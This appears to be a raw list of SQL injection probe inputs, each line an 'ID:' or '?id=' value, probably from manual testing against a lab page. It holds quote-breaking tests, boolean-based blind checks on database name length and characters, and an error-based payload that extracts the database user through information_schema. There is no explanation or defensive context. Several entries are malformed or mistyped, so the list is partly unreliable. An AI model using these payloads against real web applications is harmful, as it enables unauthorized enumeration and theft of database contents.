ID:1'
ID:2'
ID:2')-- 
ID:2''-- 
ID:2-- 
ID:2 and 1=2
ID:1 and =1
ID:1' and '1'=1'
ID:1')-- 
ID:1'
ID:1')-- 
ID:2 and 1=2
ID:2' and 1=2
ID:2' and 1=2
ID:1 and 1=2
ID:1 left (database (),1)
ID:1 left (database ())=6
ID:1 left (database (),1)-- 
ID:1'-- 
ID:1')---
ID:1')-- 
ID:2 and 1=2
ID:2 and left(database(),2)-- 
ID:1 left (database (),1)
ID:1 and length(database())=8
ID:1 and length(database())=9
ID:1 and length(database())=223
ID:1 and length(database())=223
ID:1 and length(database())=223
ID:1 and length(database())=223
ID:1 and left(database),1)-- 
ID:1' union Select 1,count(*),concat(0x3a,0x3a,(select user()),0 x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a-- 
ID:1'
ID:1'and length ((select database()))>9-- 
ID:1'and ascii(substr((select database()),1,1))=115-- 
ID:?id=1'and length((select database()))>3-- 
ID:?id=1')-- 
ID:?id=1-- 
ID:?id=2')-- 
ID:?id=2' and '1'=2
